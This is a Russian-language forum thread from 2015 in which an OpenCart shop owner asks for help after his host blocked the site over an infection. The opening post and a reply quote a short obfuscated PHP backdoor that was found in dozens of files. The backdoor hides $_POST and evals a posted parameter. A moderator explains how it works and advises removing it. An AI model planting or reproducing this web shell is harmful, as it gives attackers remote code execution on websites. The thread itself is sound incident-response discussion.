[Решено] Получил предупреждение о вирусе

Тема в разделе "OpenCart", создана пользователем eGeo, 29 дек 2015.

Статус темы:
Закрыта.
  1. eGeo

    eGeo

    Регистрация:
    30 авг 2013
    Сообщения:
    134
    Симпатии:
    5
    Сегодня ждал неприятностей и прилетели с неожиданной стороны, с хостинга!
    Цитирую службу поддержки:

    Ваш сайт заблокирован за запуск запрещенных процессов:
    5007 686950 0.0 0.0 837236 4708 ? Sl 10:36 0:00 ././crond

    Проверьте следующие файлы, они могут быть заражены:
    httpdocs/system/engine/themes.php
    httpdocs/system/library/gallery.php
    httpdocs/system/defines.php
    httpdocs/system/database/sqlite.php
    httpdocs/download/dir.php
    httpdocs/1_distribution/system/general.php
    httpdocs/1_distribution/system/library/sms.php
    httpdocs/1_distribution/install/controller/menu.php
    httpdocs/1_distribution/catalog/language/russian/product/manufacturer.php
    httpdocs/1_distribution/catalog/language/russian/product/category.php
    httpdocs/1_distribution/catalog/language/english/common/general.php
    httpdocs/1_distribution/catalog/language/english/mail/voucher.php
    httpdocs/1_distribution/catalog/language/english/product/product.php
    httpdocs/1_distribution/catalog/language/english/product/search.php
    httpdocs/1_distribution/catalog/language/english/account/model.php
    httpdocs/1_distribution/catalog/language/english/payment/free_checkout.php
    httpdocs/1_distribution/catalog/model/catalog/manufacturer.php
    httpdocs/1_distribution/catalog/model/payment/sagepay.php
    httpdocs/1_distribution/catalog/controller/dump.php
    httpdocs/stats.php
    httpdocs/image/data/2/files.php
    httpdocs/image/cache/data/krupnomer/template.php
    httpdocs/catalog/view/theme/fancycart/gallery.php
    httpdocs/catalog/view/theme/fancycart/template/checkout/dump.php
    httpdocs/catalog/view/javascript/jquery/ui/external/header.php
    httpdocs/catalog/view/javascript/jquery/ui/themes/ui-lightness/sql.php
    httpdocs/catalog/view/javascript/jquery/colorbox/images/view.php
    httpdocs/catalog/view/javascript/jquery/superfish/js/alias.php
    httpdocs/catalog/view/javascript/unitpngfix/xml.php
    httpdocs/catalog/language/russian/module/welcome.php
    httpdocs/catalog/language/russian/shipping/utf.php
    httpdocs/catalog/language/russian/mail/affiliate.php
    httpdocs/catalog/language/russian/total/handling.php
    httpdocs/catalog/language/russian/affiliate/forgotten.php
    httpdocs/catalog/language/english/common/maintenance.php
    httpdocs/catalog/language/english/shipping/item.php
    httpdocs/catalog/language/english/product/stats.php
    httpdocs/catalog/model/total/klarna_fee.php
    httpdocs/catalog/model/payment/user.php
    httpdocs/catalog/controller/checkout/xml.php
    httpdocs/catalog/controller/common/header.php
    httpdocs/catalog/controller/module/slideshow.php
    httpdocs/catalog/controller/affiliate/include.php
    httpdocs/catalog/controller/account/wishlist.php
    В них содержится код:
    <?php
    $lev8= "sou_tper"; $oixr1 =$lev8[0]. $lev8[4]. $lev8[7]. $lev8[4]. $lev8[1].$lev8[2]. $lev8[5]. $lev8[5].$lev8[6]. $lev8[7];$wer79= $oixr1 ( $lev8[3]. $lev8[5] . $lev8[1]. $lev8[0]. $lev8[4] ); if ( isset(${ $wer79 } ['qf385ab'] )){ eval(${$wer79} [ 'qf385ab']); } ?>

    Для разблокировки, устраните проблему.

    Кто нибудь сталкивался с аналогичной проблемой?
    Откуда мог прилететь вирус?
    Что за "запуск запрещенных процессов: 5007 686950 0.0 0.0 837236 4708 ? Sl 10:36 0:00 ././crond" ?
    Как с ним бороться?
     
  2. MGT1

    MGT1

    Регистрация:
    5 янв 2013
    Сообщения:
    617
    Симпатии:
    182
    Что установил последнее?
     
  3. eGeo

    eGeo

    Регистрация:
    30 авг 2013
    Сообщения:
    134
    Симпатии:
    5
    Последний год ничего на этом магазине не ставил. Клиент может быть что-то ставил?

    В отчете анитивируса хостинга написано "На ваших сайтах вирусы и вредоносные программы не обнаружены."
    А тех поддержка заблокировала и требует устранить или заплатить и они сами устранят.
     
  4. MGT1

    MGT1

    Регистрация:
    5 янв 2013
    Сообщения:
    617
    Симпатии:
    182
    ну само по себе врятли появилось, разве умышлено. Скорее всего занес с чем-то. Файлы через бейс64 проганял? Возьми бекап и сверь файлы.
     
  5. skiv14

    skiv14

    Регистрация:
    9 июн 2015
    Сообщения:
    412
    Симпатии:
    159
    Судя по сообщению, проблема в
    <?php
    $lev8= "sou_tper"; $oixr1 =$lev8[0]. $lev8[4]. $lev8[7]. $lev8[4]. $lev8[1].$lev8[2]. $lev8[5]. $lev8[5].$lev8[6]. $lev8[7];$wer79= $oixr1 ( $lev8[3]. $lev8[5] . $lev8[1]. $lev8[0]. $lev8[4] ); if ( isset(${ $wer79 } ['qf385ab'] )){ eval(${$wer79} [ 'qf385ab']); } ?>

    А такой код php действительно есть в указанных файлах ?

    Уровни какие-то, может мега-меню какое-то устанавливали ?

    Проверить файлы на искомый код, если там ничего нет - отключить все модули vkmod, если проблема останется - спросить сколько будет стоить устранение сотрудниками хостинга ?
    Может там делов на копейку и не стоит того времени, которое на это будет потрачено.
     
  6. Dotrox

    Dotrox Команда форума

    Регистрация:
    27 ноя 2012
    Сообщения:
    2.050
    Симпатии:
    778
    Это бекдор. Весь код до if нужен, чтоб спрятать $_POST, а дальше идёт проверка есть ли в пост POST запросе параметр qf385ab и если есть, выполнение его содержимого через eval.

    Раз уж у вас есть список файлов с этим кодом, просто поудаляйте его из всех этих файлов. А потом думайте, как он туда мог попасть. А варианта только два: либо что-то устанавливалось и при заливке заменило все эти файлы, что маловероятно, ибо должно было повлечь появление хоть каких-то ошибок, либо этот код напихали вручную уже прямо в сам магазин.

    Кстати, в этом списке у вас есть странные файлы, которых по умолчанию нет в ОК, а некоторых и в принципе быть не может там, где они есть:
     
    eGeo нравится это.
  7. eGeo

    eGeo

    Регистрация:
    30 авг 2013
    Сообщения:
    134
    Симпатии:
    5
    Очень практичная информация. Еще один практичный вопрос: хостер отключил все сервисы на этот магазин, в т.ч. и файловый менеджер. Насколько опасно по ФТП загрузить эти файлы на комп? Не заражу
     
  8. Dotrox

    Dotrox Команда форума

    Регистрация:
    27 ноя 2012
    Сообщения:
    2.050
    Симпатии:
    778
    Это не те виды вредоносного кода, которые могут навредить компьютеру.
     
  9. eGeo

    eGeo

    Регистрация:
    30 авг 2013
    Сообщения:
    134
    Симпатии:
    5
    Все проблемы решены! Кроме одной: не выяснили откуда залетел бэкдор...
    В процессе очистки уже на глазок можно было находить зараженные файлы: по дате, по размеру, по названию.
    Одним словом, хеппи энд!
     
Статус темы:
Закрыта.